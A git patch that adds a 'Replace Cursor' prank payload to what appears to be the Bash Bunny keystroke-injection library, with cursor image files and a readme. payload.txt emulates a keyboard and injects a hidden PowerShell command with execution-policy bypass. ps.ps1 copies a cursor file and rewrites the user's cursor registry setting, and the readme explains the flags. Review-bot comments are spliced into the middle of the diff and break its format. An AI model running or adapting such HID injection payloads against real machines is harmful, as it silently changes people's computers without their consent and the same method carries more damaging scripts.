From e1700bdc91859b3c0d9b9cd8d796715b6a83262b Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Tue, 21 Dec 2021 23:31:08 +0000 Subject: [PATCH] New payload - Replace Cursor (#437) * New payload - Replace Cursor * Added Cursor - follow the white rabbit * Update Readme --- .../prank/Win_PoSH_ReplaceCursor/b.ani | Bin 0 -> 34462 bytes .../prank/Win_PoSH_ReplaceCursor/b.cur | Bin 0 -> 4286 bytes .../prank/Win_PoSH_ReplaceCursor/payload.txt | 20 ++++++++ .../prank/Win_PoSH_ReplaceCursor/ps.ps1 | 15 ++++++ .../prank/Win_PoSH_ReplaceCursor/readme.md | 47 ++++++++++++++++++ .../prank/Win_PoSH_ReplaceCursor/w.cur | Bin 0 -> 13942 bytes 6 files changed, 82 insertions(+) create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/b.ani create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/b.cur create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/payload.txt create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/ps.ps1 create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/readme.md create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/w.cur 
diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/b.ani b/payloads/library/prank/Win_PoSH_ReplaceCursor/b.ani new file mode 100644 index 0000000000000000000000000000000000000000..606a1f86da22427b93bc097995bbe16eb7ba8bd6 GIT binary patch literal 34462 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 a1Xw>(9qRgx5?^0hbvTQ)FlV4&TKzwCdtnU# literal 0 HcmV?d00001 
diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/b.cur b/payloads/library/prank/Win_PoSH_ReplaceCursor/b.cur new file mode 100644 index 0000000000000000000000000000000000000000..be16abcf73c1d61fb6c2bc7ba1511e6a7452da42 GIT binary patch literal 4286 zcmeHJc}SdB5dU=3Sd8lxtXE{WYtdbg^}e;<@vbL`_kFBa5v*eWh$o(?wNa_oq-qNm z3$4L|X`yPNB-Bbn=mFgl*oM%?7UDLgjnS>Izqj=J_*_hO8^k|~18?8^X5O2bH}ji$ z%P_`_5hE5eptH>TmJIU(R#FTxMid65_+^+*$WG}r0;dr;jllms0*#H0K~Ygr;|U1~ zS4&GvD^K#iH8nN4E-o$_*d%nMr>B2#QuY@Y7tP$=-M3lWp`oGMZEbBf$7O$JW=2?5 zRh6HZnD|yqOw1Pn0Ri74&Ns8Nvfk|J>5*4dRMfGyU0q!@$U|&jU!P2^Rtu;PlarGc zDwRsR{x3c?H8n|-l9Jx`_4WOW)vr5?#p1n?kdTLzZ)Rpj3JVKggFmkV1Dn(q@{-rp z)s;`zhSJ#Bm_710Cy_|FeB!J&uTPs{`!o2vYHDgq^7HerWn^SrD=sb`HqN_@ThqJS@ z3c1Vj@$vbEG^&*kzZ*1i54V){pv$H?8w6r8aK|zS`(MeI%F5H{;^smeIF*fn62ET7SH~y}v@uZL!}^n}M~=?(S|G_8duw z^M#d_mFIPZOG`@v-1qg=)YKK&{si+@Zf@>v%t~`}b5c-Ha5W+#;x}VsVFH@xUETD1WMsrTCnsmt!NFk<@lNLNnVp>#A_j%vaXP8Z=;-M0QBSuh zANCGnV`INTY=1<3?I2&=UMlzS@Yro`Za$=!wE_N1z{6cue_&u>EtL%n3|QcfGdTN4 zSXkIja&qzw=>IM=GxHYaE!30Vnxi^_&pYky?GaSxQRL?4mIFTLFLd`J-e+--O+Now z*TDM^d3kx^y0(XghU^pyg&*wn^L2Z9dG!_*714gk`9#;~GX%0jJlYFzzc-{(=_O#h z9~fx?KGPZ+8d6Ye_gNh_Ha35jmzQ5g&3*~I{)D&av8}D`0W0UvkoTfrcky}D_S)JS z866!Z@R{==I5>DOK0f|Ba_)tk7lFN1^x4N$j<<6cV;??m;{BOo&*+=cJAbaM ztW0P1^5^yS^)u)zSI|Qj>HFQ<+IoR6r|X4!go15k4>4-XH&NO_3S8N6R>SaQA} zwWb(BydEK*U*n7$J$qb4{X$;fv$nQA(f854Y(bTS;7s5Zb?cN!70VFFbmLNp@s4**|_ AjsO4v literal 0 HcmV?d00001 diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/payload.txt b/payloads/library/prank/Win_PoSH_ReplaceCursor/payload.txt new file mode 100644 index 00000000..9a823043 --- /dev/null +++ b/payloads/library/prank/Win_PoSH_ReplaceCursor/payload.txt 
@@ -0,0 +1,20 @@
+# Title: Replace Cursor
+# Description: Replaces the standard arrow with a little bash bunny.
+# Author: Cribbit
+# Version: 1.0
+# Category: Pranks
+# Target: Windows (Powershell 5.1+)
+# Attackmodes: HID & STORAGE
+# Extensions: Run
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE
+
+LED ATTACK
+
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ps.ps1')"
+
+LED FINNISH
\ No newline at end of file
diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/ps.ps1 b/payloads/library/prank/Win_PoSH_ReplaceCursor/ps.ps1
new file mode 100644
index 00000000..25d4bff4
--- /dev/null
+++ b/payloads/library/prank/Win_PoSH_ReplaceCursor/ps.ps1
@@ -0,0 +1,15 @@
+# Copies the bunny ani file to the users profile.
+$p=(gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\b.ani'
+$f= $Env:USERPROFILE+'\b.ani'
+if (Test-Path $p)
+{
+ cp $p $f
+}
+else
+{
+ cp ($p -replace "1", "2") $f
+}
+# Set the registory value of Arrow to the new cursor
+sp 'HKCU:Control Panel\Cursors' Arrow '%USERPROFILE%\b.ani';
+# Tell the system to update the displayed cursor
+(Add-Type -Name c -Pass -M '[DllImport("user32.dll")] public static extern bool SystemParametersInfo(int A,int b,int c,int d);')::SystemParametersInfo(87,0,0,3)
\ No newline at end of file
diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/readme.md b/payloads/library/prank/Win_PoSH_ReplaceCursor/readme.md
new file mode 100644
index 00000000..fc080180
--- /dev/null
+++ b/payloads/library/prank/Win_PoSH_ReplaceCursor/readme.md
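Review bot: `LED FINNISH` on the last line of the payload.txt hunk does not match the `FINISH` state that the readme's Colours table documents, so the closing green pattern is likely never shown; change it to `LED FINISH`. The `# Target:` header here says `Windows (Powershell 5.1+)` while the readme says `Windows 10 (Powershell 5.1+)`; pick one wording so the two files agree.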
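Review bot: Lines 2–11 of the ps.ps1 hunk hard-code `payloads\switch1\b.ani` and fall back with `$p -replace "1", "2"`, which rewrites every `1` in the path rather than only the switch number and duplicates the switch selection payload.txt already performs through `$SWITCH_POSITION`. Because payload.txt invokes the script by its full path, `$PSScriptRoot` is populated (PowerShell 3+), so `$p = Join-Path $PSScriptRoot 'b.ani'` replaces the whole `if`/`else` and works for either switch. The script also overwrites the `Arrow` value under `HKCU:Control Panel\Cursors` without recording the previous setting; capture it first with `(Get-ItemProperty 'HKCU:Control Panel\Cursors').Arrow` and document the restore step so the change is reversible. In the comment on line 12, `registory` should read `registry`.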
@@ -0,0 +1,47 @@
+# Replace Cursor
+- Author: Cribbit
+- Version: 1.0
+- Target: Windows 10 (Powershell 5.1+)
+- Category: Pranks
+- Attackmode: HID & Storage
+- Extensions: Run
+- Props: The Hak5 Team (Wallpaper changer & Eject USB sound)
+
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
+
+## Description
+Replaces the standard arrow with a little bash bunny icon.
+
+## Notes
+I have included a both a static and animated cursor.
+
+## Information about SystemParametersInfo
+### Microsoft Doc:
+
+https://docs.microsoft.com/en-gb/windows/win32/api/winuser/nf-winuser-systemparametersinfoa
+
+### Flags
+
+```
+SPI_SETCURSORS = 0x0057;
+```
+
+Convert uint to int = 87;
+
+```
+SPIF_UPDATEINIFILE = 0x01;
+SPIF_SENDCHANGE = 0x02;
+```
+
+Bitwise "OR" these two together (0x01 -bor 0x02) = 3;
+
+
+## Colours
+| Status | Colour | Description |
+| ------ | ----------------------------- | --------------------------- |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISH | Green blink followed by SOLID | Script is finished |
\ No newline at end of file
diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/w.cur b/payloads/library/prank/Win_PoSH_ReplaceCursor/w.cur new file mode 100644 index 0000000000000000000000000000000000000000..b3661bf19fca2166b7a9108078bf3606d1fba06b GIT binary patch literal 13942 zcmeGi2~bp5@*_wnqv)<0%_i1Zi5DUU6qE#55X1pT4rK-;VFU&l6af>wMGnDrSv6=` zC~h=J0D&mTDPn4CYeEbtDgvtzJSPwZ!x51Cnz!Ab`QsOufJjJEMNjqg`~CWL_dEXk z@AZ2WH4c8WXHx*`RMHfRng=OeU3~rvl{A;43W2u(o@N7@0jkg`iV6Y#7>u>RSPP7` zz$mqVA=oh(C0hzJ)2Hi%TUzo6F!BKlHg4RC>Cu82V5qvSt&Je$n+>i4$K` zf%alQzhLB7plyVppwMyy1G^Y^_q|O0|7u_$x;hL`7H-Pp4 z9y%29n62yc&yPu=>_fmi2M!!4XXhzPuUci5ckbNzCMY8VoCY{3I6C?jrKF^`GCH3> ze@=pf|8XA*UX?*h0L=>y4jt5feSJOQ^XWQ2qNtgngBq3#sH(ml%ICYFogV?~ZEc;& zzI|c$7=L18+(-$tJv{2N-aLiO!*G1ZL@nS}MQ&SV!x^>rGAD``a z)~$0Y`1I3Vcfp5FwjE_@&~eMeWL+%k900U|cZVq}k$gv{PF)!TyzziN?d|PMmQvc? z-A!;zB6N0klDl`y;N4DF6g+!2w$|HwJNA)@y85zXmX;f`#NwS#y}UjnR#t1so;`tO zjPh^4{f;bN%#E2jb6G@e?73eUKGO8`jE;{#7T#dbd1!mlq7Ml659n`Sy3`1C`bY%= zpFD4G-y)`bT3SXs3%a}!r%uimt_@WNjhfuyQ zC@Ac{y}eTbBailvAOCk%V`FcZWBp4@%gCWaN2MVD4Dfzf*gqc#g>E-z&6wLr0QKa^kv~%(ePlxLeL*~XHm(l%zJN4nXy}AHIk};aH{#-w8n0aW z4}oth&R-=$;Z}m}s?<0u0(pOQL zcaXzb8lkE>=OED78a7SvNB?B&K
z zt%A-m7;AyC78q-Ru@)F>fw2}CYk{#A7;6D&0bF6u`jfSUnz6BKwxy*t?lUl^TfyTA zU=Qz*@F%Fpo35^(5r|*bGjVa;Z{S|u+M3>%|Dmhk;IQRpQc_9_`pkw!ix%fjCMK@mWM*Dg#G%pm#>VGl)ha%g(Lk9|1XCW*58u6xJ$pjR;jBUS^yyQ= zjz?g84&x;L{(DNDoP5#8mx4#~Gnt=&|Bgr$K=k!ZQHBN$jrrlm#v*vu8R0QCBh<}} zjtfdKHjHgJ6u^39W@gi8NsPRm9sm0K@2|nQSsUo;@$lG&{;N7WZ>s=WU~TPrm9EUl z{Aszk>>@m#{k4jUO2&m@(-S97SM&MXiHnQq7WPAa{tYsJz6j$c-BD4|HA3Ou=8@z9cC3wPELnV3snKJHpM&?8F}WJSnOAvo}Sq$5NyVNP#FRL^~}s{ z$X8#z99u_MAg0^l?;oIuA+y{YGzoFl_MV>pP0`fULJSSf(f8NBonmAp%mO`yOpKrH z6rKgGUr(O{KW6h^C*9iGhJH5!P6vD)nCjxb-@8zxMch2@)YE*Qw4lPABZ($_bKZ+}7q$aUG;+6~+Pl$4AP z(D6Om0V?5exTk;)8@^9y4#$s2J=N0EB}qvan&mdTY;0_YNl(whGdb*s z8+eYaa0n9J-9505?0|F0{^!?hxvZ?qGBdL^Xk#j%QczKOD|E+>K*jkY>cBI~4?i^S z=l{Zm4)LJq`RUVN)z#G0kp24)J%Z;VeSP}u?0ZOKUw;dD4bI9H_dnQv4JG~Mm$7wD zPCjUV(EAT>zBwZ_EiJpBS}0ouI1`WtF4wmpEbP!DJf~#?-Zx1|Na=v}NeBDx30vk> z(lFO|Iy%y8%gK!GU!z0uUsF>%+}YXn=BxNIm@J;#KY8+m6c?BD6UFt?!i9^m{c(L@ z2*?BUQd6@yWo*1Q3D%;`o}Sy_Jk|rW76n*MMVY4$hg$Q{#G*ippWq%&-4}ZIFpYwH8rzy#flAN!v?pT z5fLYzSXglL*!h@lXlSMF^qpfd566&HDkboJ!#e?$+S&$K$Nc#C3oWNkMb{V^(d%QJ zhf7$9-%OdgxfKzKc9AJlcnN-f+ZFdqP%i?=F#f~+1Adab`=;9u9=y0hCf|?d+uCl! zvGL5x%I@0g)%MqFYwLOy4C5c$A9UrqxNIlm#?f~Oa9^Sch<6DXd>7K}{R+MxFRiVx zZ{+bV$m#{u2m7>ExX)1_mHw#k4%eSMcI+zysq!O7PSv!wwnLw0bsar=@`*y|6%+Dz z=9ZZmy{}MXd{9Dhj;*PztRxJ=eWDJLXgBu30Px-cH@97w_iX?E@P{~tZr&^;h%krZ z-HbeU_dprkuPM23;l-V_SF8dp9vvND@8Uv#2L|xt1xruQA=bxd4+#qkBOV?*2*ew4 zKQ-9=`xeLu$B(y9FfjNyS4YP=m!g(O0PjP&=82}JJbM0lRp0R*9ljUPw{$$k*w~{$ zu5+}>G+o_~aR2+OcW|PjVsMXxdlWjB<>KN=Hf{`%O`62VeFh!R8g0i}_B6%ffbQVn zgAWFouVD_R<4*&{5?ShgpX595SVS5dbD>?g6yf`c`w}*^wY9^&vPDYXx!=cUC06ZM zuJkHcyOzH1`3uP0v9;x2M})Lw;>5WJm6ZDj8b;@HNB8Gx{Bj Slz